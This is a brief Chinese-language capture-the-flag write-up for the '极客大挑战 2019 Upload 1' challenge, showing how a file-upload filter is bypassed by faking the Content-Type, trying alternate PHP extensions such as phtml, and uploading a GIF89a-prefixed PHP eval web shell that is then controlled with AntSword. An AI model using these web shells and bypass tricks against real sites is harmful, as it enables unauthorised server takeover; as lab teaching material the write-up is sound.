[极客大挑战 2019]Upload 1

首先进入网址

 发现是文件上传

创建一个test.php文件，写入一句话木马<?php eval($_POST['b'])?>，然后上传

 提示不是图片

抓个包，发现content-type不是图片类型

 将其改成   image/png ,  再重新放包，结果提示过滤了php

 再尝试php3, pht也过滤

 当尝试phtml，发现’<?'被过滤了

 更换一句话木马为GIF89a? <script language="php">eval($_POST[b])</script>,再上传，显示成功

 文件上传成功后，再查找文件保存目录，尝试访问http://e5aeb193-58fd-4114-be5f-9eebf791adcc.node4.buuoj.cn:81/upload，发现就是保存文件的目录

 可以看到test.phtml已经上传上去了，尝试用蚁剑连接

连接成功，直接进入根目录，发现flag文件

 双击flag文件，得到flag